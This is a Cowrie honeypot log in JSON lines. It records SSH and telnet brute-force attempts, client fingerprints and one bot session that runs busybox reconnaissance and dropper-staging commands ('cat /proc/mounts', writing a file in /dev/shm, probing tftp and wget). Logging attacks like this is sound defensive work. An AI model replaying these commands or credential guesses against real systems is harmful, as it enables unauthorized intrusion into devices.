{"eventid":"cowrie.login.failed","username":"chelsey","password":"chelsey1","message":"login attempt [chelsey/chelsey1] failed","sensor":"my-vps","timestamp":"2025-08-26T23:32:33.505835Z","src_ip":"80.94.95.15","session":"c99b31ae5de3"}
{"eventid":"cowrie.login.failed","username":"chelsey","password":"chelsey123","message":"login attempt [chelsey/chelsey123] failed","sensor":"my-vps","timestamp":"2025-08-26T23:32:34.576689Z","src_ip":"80.94.95.15","session":"c99b31ae5de3"}
{"eventid":"cowrie.login.failed","username":"chelsey","password":"chelsey1234","message":"login attempt [chelsey/chelsey1234] failed","sensor":"my-vps","timestamp":"2025-08-26T23:32:35.647813Z","src_ip":"80.94.95.15","session":"c99b31ae5de3"}
{"eventid":"cowrie.login.failed","username":"chelsey","password":"chelsey12345","message":"login attempt [chelsey/chelsey12345] failed","sensor":"my-vps","timestamp":"2025-08-26T23:32:36.724088Z","src_ip":"80.94.95.15","session":"c99b31ae5de3"}
{"eventid":"cowrie.session.closed","duration":"7.0","message":"Connection lost after 7.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:32:37.805138Z","src_ip":"80.94.95.15","session":"c99b31ae5de3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42152,"dst_ip":"1.2.3.4","dst_port":22,"session":"38993363f97e","protocol":"ssh","message":"New connection: 212.227.235.229:42152 (1.2.3.4:22) [session: 38993363f97e]","sensor":"my-vps","timestamp":"2025-08-26T23:32:57.820999Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T23:32:57.822023Z","src_ip":"212.227.235.229","session":"38993363f97e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T23:32:57.993024Z","src_ip":"212.227.235.229","session":"38993363f97e"}
{"eventid":"cowrie.login.success","username":"root","password":"1qw23er4","message":"login attempt [root/1qw23er4] succeeded","sensor":"my-vps","timestamp":"2025-08-26T23:32:58.501170Z","src_ip":"212.227.235.229","session":"38993363f97e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T23:32:58.862070Z","src_ip":"212.227.235.229","session":"38993363f97e"}
{"eventid":"cowrie.command.input","input":"hostname","message":"CMD: hostname","sensor":"my-vps","timestamp":"2025-08-26T23:32:58.862903Z","src_ip":"212.227.235.229","session":"38993363f97e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","size":13,"shasum":"7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:32:59.033280Z","src_ip":"212.227.235.229","session":"38993363f97e"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:32:59.034354Z","src_ip":"212.227.235.229","session":"38993363f97e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60325,"dst_ip":"1.2.3.4","dst_port":23,"session":"5157624ca147","protocol":"telnet","message":"New connection: 212.227.125.160:60325 (1.2.3.4:23) [session: 5157624ca147]","sensor":"my-vps","timestamp":"2025-08-26T23:33:06.656803Z"}
{"eventid":"cowrie.session.closed","duration":13.358177423477173,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:33:20.014918Z","src_ip":"212.227.125.160","session":"5157624ca147"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37840,"dst_ip":"1.2.3.4","dst_port":22,"session":"b3c2e64959c2","protocol":"ssh","message":"New connection: 212.227.125.160:37840 (1.2.3.4:22) [session: b3c2e64959c2]","sensor":"my-vps","timestamp":"2025-08-26T23:33:35.394300Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T23:33:35.395301Z","src_ip":"212.227.125.160","session":"b3c2e64959c2"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-26T23:33:35.661705Z","src_ip":"212.227.125.160","session":"b3c2e64959c2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44860,"dst_ip":"1.2.3.4","dst_port":23,"session":"b0aea43256fa","protocol":"telnet","message":"New connection: 212.227.125.160:44860 (1.2.3.4:23) [session: b0aea43256fa]","sensor":"my-vps","timestamp":"2025-08-26T23:33:36.630201Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-08-26T23:33:36.714602Z","src_ip":"212.227.125.160","session":"b0aea43256fa"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T23:33:36.828302Z","src_ip":"212.227.125.160","session":"b0aea43256fa"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:33:43.394535Z","src_ip":"212.227.125.160","session":"b3c2e64959c2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35888,"dst_ip":"1.2.3.4","dst_port":22,"session":"649924ee459a","protocol":"ssh","message":"New connection: 212.227.235.229:35888 (1.2.3.4:22) [session: 649924ee459a]","sensor":"my-vps","timestamp":"2025-08-26T23:34:18.371965Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T23:34:19.532891Z","src_ip":"212.227.235.229","session":"649924ee459a"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T23:34:19.534079Z","src_ip":"212.227.235.229","session":"649924ee459a"}
{"eventid":"cowrie.login.failed","username":"test","password":"wasd","message":"login attempt [test/wasd] failed","sensor":"my-vps","timestamp":"2025-08-26T23:34:24.837748Z","src_ip":"212.227.235.229","session":"649924ee459a"}
{"eventid":"cowrie.session.closed","duration":"8.7","message":"Connection lost after 8.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:34:27.114298Z","src_ip":"212.227.235.229","session":"649924ee459a"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":59512,"dst_ip":"1.2.3.4","dst_port":22,"session":"e91b3997c9ba","protocol":"ssh","message":"New connection: 217.72.205.35:59512 (1.2.3.4:22) [session: e91b3997c9ba]","sensor":"my-vps","timestamp":"2025-08-26T23:34:31.609926Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:34:31.611020Z","src_ip":"217.72.205.35","session":"e91b3997c9ba"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39972,"dst_ip":"1.2.3.4","dst_port":22,"session":"55d7113d9b58","protocol":"ssh","message":"New connection: 212.227.235.229:39972 (1.2.3.4:22) [session: 55d7113d9b58]","sensor":"my-vps","timestamp":"2025-08-26T23:35:36.828123Z"}
{"eventid":"cowrie.client.version","version":"\u0016\u0003\u0001\u0000{\u0001\u0000\u0000w\u0003\u0003n}\\xa4\\x9a\\x91\u01d2\\xa8\\xcf\\xe0\u0004\\xe4B\u001e\t`\\xffd`\\xab\\xe0\\x8c3\\x9eay\u0001\\xb5\\x9b\"\\xf5\\x8c\u0000\u0000\u001a\\xc0/\\xc0+\\xc0\u0011\\xc0\u0007\\xc0\u0013\\xc0\t\\xc0\u0014\\xc0","message":"Remote SSH version: \u0016\u0003\u0001\u0000{\u0001\u0000\u0000w\u0003\u0003n}\\xa4\\x9a\\x91\u01d2\\xa8\\xcf\\xe0\u0004\\xe4B\u001e\t`\\xffd`\\xab\\xe0\\x8c3\\x9eay\u0001\\xb5\\x9b\"\\xf5\\x8c\u0000\u0000\u001a\\xc0/\\xc0+\\xc0\u0011\\xc0\u0007\\xc0\u0013\\xc0\t\\xc0\u0014\\xc0","sensor":"my-vps","timestamp":"2025-08-26T23:35:36.829043Z","src_ip":"212.227.235.229","session":"55d7113d9b58"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:35:36.829797Z","src_ip":"212.227.235.229","session":"55d7113d9b58"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38263,"dst_ip":"1.2.3.4","dst_port":23,"session":"50203616e8e6","protocol":"telnet","message":"New connection: 212.227.125.160:38263 (1.2.3.4:23) [session: 50203616e8e6]","sensor":"my-vps","timestamp":"2025-08-26T23:35:41.336303Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51450,"dst_ip":"1.2.3.4","dst_port":22,"session":"f4f86da51c55","protocol":"ssh","message":"New connection: 212.227.125.160:51450 (1.2.3.4:22) [session: f4f86da51c55]","sensor":"my-vps","timestamp":"2025-08-26T23:35:50.193192Z"}
{"eventid":"cowrie.client.version","version":"\u0016\u0003\u0001\u0000{\u0001\u0000\u0000w\u0003\u00031,\\x83y6L\\x9c ;>A\\xc8z\\xa2\\xe1\u0007\u0010\\x9d\\xcd\u0624E\\xd4\\xf8[\\xb3\\xcf\u001a(\\xa1\\xe9G\u0000\u0000\u001a\\xc0/\\xc0+\\xc0\u0011\\xc0\u0007\\xc0\u0013\\xc0\t\\xc0\u0014\\xc0","message":"Remote SSH version: \u0016\u0003\u0001\u0000{\u0001\u0000\u0000w\u0003\u00031,\\x83y6L\\x9c ;>A\\xc8z\\xa2\\xe1\u0007\u0010\\x9d\\xcd\u0624E\\xd4\\xf8[\\xb3\\xcf\u001a(\\xa1\\xe9G\u0000\u0000\u001a\\xc0/\\xc0+\\xc0\u0011\\xc0\u0007\\xc0\u0013\\xc0\t\\xc0\u0014\\xc0","sensor":"my-vps","timestamp":"2025-08-26T23:35:50.214352Z","src_ip":"212.227.125.160","session":"f4f86da51c55"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:35:50.216314Z","src_ip":"212.227.125.160","session":"f4f86da51c55"}
{"eventid":"cowrie.session.closed","duration":12.762284517288208,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:35:54.098517Z","src_ip":"212.227.125.160","session":"50203616e8e6"}
{"eventid":"cowrie.session.connect","src_ip":"203.228.116.110","src_port":42528,"dst_ip":"1.2.3.4","dst_port":23,"session":"fd602a0c845d","protocol":"telnet","message":"New connection: 203.228.116.110:42528 (1.2.3.4:23) [session: fd602a0c845d]","sensor":"my-vps","timestamp":"2025-08-26T23:36:14.022194Z"}
{"eventid":"cowrie.login.success","username":"root","password":"default","message":"login attempt [root/default] succeeded","sensor":"my-vps","timestamp":"2025-08-26T23:36:14.579906Z","src_ip":"203.228.116.110","session":"fd602a0c845d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T23:36:14.652861Z","src_ip":"203.228.116.110","session":"fd602a0c845d"}
{"eventid":"cowrie.command.input","input":"enable","message":"CMD: enable","sensor":"my-vps","timestamp":"2025-08-26T23:36:14.933364Z","src_ip":"203.228.116.110","session":"fd602a0c845d"}
{"eventid":"cowrie.command.input","input":"system","message":"CMD: system","sensor":"my-vps","timestamp":"2025-08-26T23:36:14.935294Z","src_ip":"203.228.116.110","session":"fd602a0c845d"}
{"eventid":"cowrie.command.failed","input":"system","message":"Command not found: system","sensor":"my-vps","timestamp":"2025-08-26T23:36:14.936352Z","src_ip":"203.228.116.110","session":"fd602a0c845d"}
{"eventid":"cowrie.command.input","input":"shell","message":"CMD: shell","sensor":"my-vps","timestamp":"2025-08-26T23:36:14.937542Z","src_ip":"203.228.116.110","session":"fd602a0c845d"}
{"eventid":"cowrie.command.failed","input":"shell","message":"Command not found: shell","sensor":"my-vps","timestamp":"2025-08-26T23:36:14.938539Z","src_ip":"203.228.116.110","session":"fd602a0c845d"}
{"eventid":"cowrie.command.input","input":"sh","message":"CMD: sh","sensor":"my-vps","timestamp":"2025-08-26T23:36:14.939412Z","src_ip":"203.228.116.110","session":"fd602a0c845d"}
{"eventid":"cowrie.command.input","input":"cat /proc/mounts; /bin/busybox TXDCO","message":"CMD: cat /proc/mounts; /bin/busybox TXDCO","sensor":"my-vps","timestamp":"2025-08-26T23:36:15.219474Z","src_ip":"203.228.116.110","session":"fd602a0c845d"}
{"eventid":"cowrie.command.input","input":"cd /dev/shm; cat .s || cp /bin/echo .s; /bin/busybox TXDCO","message":"CMD: cd /dev/shm; cat .s || cp /bin/echo .s; /bin/busybox TXDCO","sensor":"my-vps","timestamp":"2025-08-26T23:36:15.501536Z","src_ip":"203.228.116.110","session":"fd602a0c845d"}
{"eventid":"cowrie.command.input","input":"tftp; wget; /bin/busybox TXDCO","message":"CMD: tftp; wget; /bin/busybox TXDCO","sensor":"my-vps","timestamp":"2025-08-26T23:36:15.782954Z","src_ip":"203.228.116.110","session":"fd602a0c845d"}
{"eventid":"cowrie.command.input","input":"dd bs=52 count=1 if=.s || cat .s || while read i; do echo $i; done < .s","message":"CMD: dd bs=52 count=1 if=.s || cat .s || while read i; do echo $i; done < .s","sensor":"my-vps","timestamp":"2025-08-26T23:36:16.065858Z","src_ip":"203.228.116.110","session":"fd602a0c845d"}
{"eventid":"cowrie.command.failed","input":"while read i","message":"Command not found: while read i","sensor":"my-vps","timestamp":"2025-08-26T23:36:16.068657Z","src_ip":"203.228.116.110","session":"fd602a0c845d"}
{"eventid":"cowrie.command.input","input":"/bin/busybox TXDCO","message":"CMD: /bin/busybox TXDCO","sensor":"my-vps","timestamp":"2025-08-26T23:36:16.070863Z","src_ip":"203.228.116.110","session":"fd602a0c845d"}
{"eventid":"cowrie.command.input","input":"rm .s; exit","message":"CMD: rm .s; exit","sensor":"my-vps","timestamp":"2025-08-26T23:36:16.351388Z","src_ip":"203.228.116.110","session":"fd602a0c845d"}
{"eventid":"cowrie.command.input","input":"q","message":"CMD: q","sensor":"my-vps","timestamp":"2025-08-26T23:36:16.352767Z","src_ip":"203.228.116.110","session":"fd602a0c845d"}
{"eventid":"cowrie.command.failed","input":"q","message":"Command not found: q","sensor":"my-vps","timestamp":"2025-08-26T23:36:16.353617Z","src_ip":"203.228.116.110","session":"fd602a0c845d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e6caeedf2fa454a776fd5add164e15524c28697d100fd09e4e1a531e204d2011","size":3550,"shasum":"e6caeedf2fa454a776fd5add164e15524c28697d100fd09e4e1a531e204d2011","duplicate":false,"duration":"2.0","message":"Closing TTY Log: var/lib/cowrie/tty/e6caeedf2fa454a776fd5add164e15524c28697d100fd09e4e1a531e204d2011 after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:36:16.633108Z","src_ip":"203.228.116.110","session":"fd602a0c845d"}
{"eventid":"cowrie.session.closed","duration":2.615333318710327,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:36:16.637444Z","src_ip":"203.228.116.110","session":"fd602a0c845d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39010,"dst_ip":"1.2.3.4","dst_port":22,"session":"d367ee1cc099","protocol":"ssh","message":"New connection: 212.227.235.229:39010 (1.2.3.4:22) [session: d367ee1cc099]","sensor":"my-vps","timestamp":"2025-08-26T23:36:18.404671Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T23:36:18.405463Z","src_ip":"212.227.235.229","session":"d367ee1cc099"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-26T23:36:18.614093Z","src_ip":"212.227.235.229","session":"d367ee1cc099"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:36:26.405188Z","src_ip":"212.227.235.229","session":"d367ee1cc099"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52560,"dst_ip":"1.2.3.4","dst_port":22,"session":"6838a655a918","protocol":"ssh","message":"New connection: 212.227.235.229:52560 (1.2.3.4:22) [session: 6838a655a918]","sensor":"my-vps","timestamp":"2025-08-26T23:36:33.581951Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T23:36:33.583805Z","src_ip":"212.227.235.229","session":"6838a655a918"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-26T23:36:33.764251Z","src_ip":"212.227.235.229","session":"6838a655a918"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44605,"dst_ip":"1.2.3.4","dst_port":23,"session":"fa16b916482a","protocol":"telnet","message":"New connection: 212.227.235.229:44605 (1.2.3.4:23) [session: fa16b916482a]","sensor":"my-vps","timestamp":"2025-08-26T23:36:36.773952Z"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":432,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:36:36.829099Z","src_ip":"212.227.125.160","session":"b0aea43256fa"}
{"eventid":"cowrie.session.closed","duration":180.2037868499756,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:36:36.833895Z","src_ip":"212.227.125.160","session":"b0aea43256fa"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46608,"dst_ip":"1.2.3.4","dst_port":22,"session":"4cfacee83d06","protocol":"ssh","message":"New connection: 212.227.235.229:46608 (1.2.3.4:22) [session: 4cfacee83d06]","sensor":"my-vps","timestamp":"2025-08-26T23:36:37.791127Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T23:36:38.773846Z","src_ip":"212.227.235.229","session":"4cfacee83d06"}
